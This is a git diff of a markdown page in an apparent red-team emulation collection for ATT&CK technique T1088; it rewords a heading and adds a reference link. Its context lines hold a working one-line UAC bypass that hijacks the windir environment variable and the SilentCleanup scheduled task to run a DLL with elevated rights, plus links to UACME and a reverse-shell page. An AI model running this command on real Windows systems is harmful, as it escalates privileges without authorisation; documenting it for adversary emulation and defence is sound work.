--- a/Techniques/T1088/T1088.md
+++ b/Techniques/T1088/T1088.md
@@ -7,7 +7,7 @@
 
 # Details
 
-## Exploiting environment variables in Scheduled Task for User Account Control (UAC) bypass
+## Exploit environment variables in Scheduled Task for User Account Control (UAC) bypass
 
 ```
 reg add HKCU\Environment /v windir /d "rundll32 %APPDATA%\temp.txt,DllMain " /f&schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I & reg delete HKCU\Environment /v windir /f
@@ -18,3 +18,4 @@ reg add HKCU\Environment /v windir /d "rundll32 %APPDATA%\temp.txt,DllMain " /f&
 * <https://github.com/hfiref0x/UACME>
 * <https://tyranidslair.blogspot.com/2017/05/exploiting-environment-variables-in.html>
 * <https://www.puckiestyle.nl/c-simple-reverse-shell/>
+* <https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1085/T1085.md>
